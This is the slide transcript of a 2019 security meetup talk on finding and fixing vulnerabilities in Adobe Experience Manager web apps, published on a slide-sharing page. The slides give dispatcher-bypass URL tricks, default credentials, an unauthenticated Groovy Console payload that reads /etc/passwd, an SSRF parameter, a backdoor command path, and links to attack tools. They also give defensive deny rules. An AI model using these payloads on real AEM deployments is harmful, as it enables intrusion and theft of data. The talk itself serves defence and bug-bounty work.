Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Securing AEM webapps by hacking them

Mikhail Egorov
September 03, 2019
Programming
1
980

Securing AEM webapps by hacking them

Slides from adaptTo() 2019 meetup - https://adapt.to/2019/en/schedule/securing-aem-webapps-by-hacking-them.html.

Mikhail Egorov

September 03, 2019
Tweet

More Decks by Mikhail Egorov

See All by Mikhail Egorov
A Hacker's perspective on AEM applications security
0ang3el
0
3k
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
0ang3el
4
6.8k
AEM hacker approaching Adobe Experience Manager webapps in bug bounty programs
0ang3el
3
7.9k
Hunting for security bugs in AEM webapps
0ang3el
2
23k
Neat tricks to bypass CSRF-protection
0ang3el
2
1.7k
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем веб-приложении
0ang3el
1
330

Other Decks in Programming

See All in Programming
デザイナーと協業しているNuxtプロジェクトを、ChromaticによるVRTでさらに改善した話
mozu1206
0
260
実践 AWS CDK 〜 いろいろな参照のカタチと使い分け 〜
konokenj
12
2k
Learn Ractor
m_seki
1
1.5k
NotionのURLをWorkersで綺麗にしよう!
totto2727
0
210
AWS CDKとZodを活用したバリデーションパターン集 / validation patterns with cdk and zod
gotok365
3
950
enjoy_conferences
maimux2x
0
5k
Evolving a microservice architecture: how to right-size your services
cer
PRO
0
710
The Resurrection of 
the Fast Parallel Test Runner
koic
1
3.4k
Mitigate Attacks on your PHP Supply Chain
dunglas
2
560
Symfony Messenger et ses messages: à la queleuleu…. Et s’il était temps de grouper ?
alli83
1
230
JRuby: Looking Forward
headius
1
100
LlamaIndex で Text-to-SQL 100 本ノック!
os1ma
2
770

Featured

See All Featured
Put a Button on it: Removing Barriers to Going Fast.
kastner
56
2.6k
Building Your Own Lightsaber
phodgson
96
5k
Testing 201, or: Great Expectations
jmmastey
26
5.9k
GitHub's CSS Performance
jonrohan
1022
430k
Clear Off the Table
cherdarchuk
81
300k
The Power of CSS Pseudo Elements
geoffreycrofte
54
4.5k
Principles of Awesome APIs and How to Build Them.
keavy
119
16k
Streamline your AJAX requests with AmplifyJS and jQuery
dougneiner
130
8.9k
[RailsConf 2023] Rails as a piece of cake
palkan
6
1.5k
YesSQL, Process and Tooling at Scale
rocio
158
13k
A designer walks into a library…
pauljervisheath
199
17k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
3
540

Transcript

  1. APACHE SLING & FRIENDS TECH MEETUP
    2 - 4 SEPTEMBER 2019
    Securing AEM webapps by hacking them
    Mikhail Egorov @0ang3el, Security researcher & Bug hunter.

    View Slide

  2. 2
    Intro

    View Slide

  3. whoami
    3
     Security researcher & full-time bug hunter
     https://bugcrowd.com/0ang3el
     https://hackerone.com/0ang3el
     Conference speaker
     https://www.slideshare.net/0ang3el
     https://speakerdeck.com/0ang3el

    View Slide

  4. AEM & Bug Bounties
    4

    View Slide

  5. My research on AEM security
    5
    PHDays 2015
    Hacktivity 2018
    LevelUp 2019
    https://www.slideshare.net/0ang3el

    View Slide

  6. Fellow hackers
    6
    @darkarnium, 2016
    @fransrosen, 2018
    @JonathanBoumanium, 2018
    https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c
    https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem
    http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

    View Slide

  7. Common AEM deployment
    7
    Interacts with Publish server
    via AEM Dispatcher!
    4503/tcp
    4502/tcp
    443/tcp
    ?
    Main blocks:
    • Author AEM instance
    • Publish AEM instance
    • AEM dispatcher (~WAF)

    View Slide

  8. Sources of vulnerabilities
    8
     AEM misconfiguration
     AEM code (CVEs)
     3rd-party plugins
     Your code

    View Slide

  9. 9
    Vulnerabilities due to misconfiguration

    View Slide

  10. AEM dispatcher bypass – CVE-2016-0957
    10
     Blocked by Dispatcher
     /bin/querybuilder.json
     However passed to publish instance
     /bin/querybuilder.json/a.css
     /bin/querybuilder.json/a.icoS
     /bin/querybuilder.json?a.html
     /bin/querybuilder.json;%0aa.css

    View Slide

  11. AEM dispatcher bypass – Sling “features”
    11
     When Sling Servlet is registered with
    sling.servlet.path other properties are
    ignored (e.g. sling.servlet.extensions)
     Bypassing extension check
     /bin/querybuilder.json.css
     /bin/querybuilder.feed.ico

    View Slide

  12. AEM dispatcher bypass – Sling “features”
    12
     When Sling Servlet is registered with
    sling.servlet.resourceTypes
     Bypassing path check
     Create node with proper sling:resourceType under
    /content/usergenerated/etc/commerce/smartlists

    View Slide

  13. AEM dispatcher security tips
    13
     Don’t use rules like
     /0041 { /type "allow" /url "*.css" } # This is bad
     Better use
     /0041 { /type "allow" /extension 'css' }

    View Slide

  14. AEM dispatcher security tips
    14
     Explicit deny rule for dangerous endpoints
     /0090 { /type "deny" /path "/libs/*" }
     /0091 { /type "deny" /path "/bin/querybuilder*" }
     Place explicit deny rules in the end of policy

    View Slide

  15. Default credentials
    15
     admin/admin
     author/author
     Geometrixx users
     grios:password
    [email protected]:jdoe
     …

    View Slide

  16. Default credentials
    16
    == base64(admin:admin)

    View Slide

  17. Weak passwords / Credentials bruterorcing
    17
     Properties jcr:createdBy, cq:lastModifiedBy,
    jcr:lastModifiedBy contain usernames
     Many ways to bruteforce
     LoginStatusServlet
     GetLoggedInUser servlet
     CurrentUserServlet
     …

    View Slide

  18. Weak permissions for JCR
    18
     Many ways to access JCR
     DefaultGetServlet
     QueryBuilderJsonServlet
     QueryBuilderFeedServlet
     GQLSearchServlet
     CRXDE Lite
     …

    View Slide

  19. Weak permissions for JCR
    19
     Anonymous user has jcr:write permission
    for /content/usergenerated/etc/commerce/s
    martlists

    View Slide

  20. 0
    /apps//config.author.tidy.1..json/a.ico

    View Slide

  21. Weak permissions for JCR
    21
    type=nt:file&nodename=*.zip

    View Slide

  22. Weak permissions for JCR
    22
    path=/home&p.hits=full&p.limit=-1

    View Slide

  23. 23
    Vulnerabilities due to 3-rd party components

    View Slide

  24. Groovy Console
    24
     Exposes servlet at
    /bin/groovyconsole/post.servlet without
    authentication
    by default
    https://github.com/icfnext/aem-groovy-console

    View Slide

  25. cS4VLFuCHKwX;XS
    script=def+proc+%3d+”cat+/etc/passwd”.execute()%0d%0aprintln+proc.text

    View Slide

  26. ACS AEM Tools
    26
     Exposes Fiddle with ability to execute JSP
    scripts on /etc/acs-tools/aem-
    fiddle/_jcr_content.run.html
     May not require authentication

    View Slide

  27. cS4VLFuCHKwX;X

    View Slide

  28. 28
    AEM vulnerabilities

    View Slide

  29. CVE-2018-12809 (SSRF*)
    29
     ReportingServicesProxyServlet (cq-content-insight bundle)
    @SlingServlet(
    generateComponent = true,
    metatype = true,
    resourceTypes = {"cq/contentinsight/proxy"},
    extensions = {"json"},
    selectors = {"reportingservices"},
    methods = {"GET"},
    label = "Reporting Services API proxy servlet",
    description = "Proxy servlet for Reporting Services API"
    )
    public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet {
    private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";}

    } *SSRF - Server Side Request Forgery

    View Slide

  30. CVE-2018-12809 (SSRF*)
    30
     Paths to invoke servlet
     /libs/cq/contentinsight/content/proxy.reportingservices.json
     /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
     Vulnerable parameter url
     url=http://anyurl%23/api1.omniture.com/a
    *SSRF - Server Side Request Forgery

    View Slide

  31. View Slide

  32. View Slide

  33. View Slide

  34. ExternalJobPostServlet deser / CVE?
    34
     Affects AEM 5.5 / AEM 5.6
    @Service
    @Properties(value = {
    @Property(name = "sling.servlet.extensions", value = "json"),
    @Property(name = "sling.servlet.paths", value =
    "/libs/dam/cloud/proxy"),
    @Property(name = "sling.servlet.methods", value = { "POST", "GET",
    "HEAD" })
    })
    public class ExternalJobPostServlet extends SlingAllMethodsServlet {
    ...
    }

    View Slide

  35. ExternalJobPostServlet deser / CVE?
    35
     Parameter file accepts Java serialized stream
    and passes to OIS.readObject()
     Hard to exploit in OSGI environment

    View Slide

  36. View Slide

  37. View Slide

  38. 38
    Automation

    View Slide

  39. AEM RCE bundle
    39
     Allows to get RCE* when having access to
    Felix Console
     https://github.com/0ang3el/aem-rce-bundle.git
    * RCE – Remote Code Execution

    View Slide

  40. AEM RCE bundle
    40
     Path - /bin/backdoor.html?cmd=ifconfig

    View Slide

  41. AEM Hacker
    41
     Scripts to check security of AEM application
     aem_hacker.py, aem_discoverer.py, aem_enum.py,
    aem_ssrf2rce.py, aem_server.py, response.bin,
    aem-rce-sling-script.sh
     https://github.com/0ang3el/aem-hacker.git

    View Slide

  42. DEMO
    42

    View Slide

  43. 43
    Takeaways

    View Slide

  44. Takeaways
    44
     Vulnerabilities can occur on different levels
     Install security updates
     Defense in depth
     Check security of AEM application
     Pentest / Bug bounty

    View Slide

  45. 45
    Thank you
    @0ang3el

    View Slide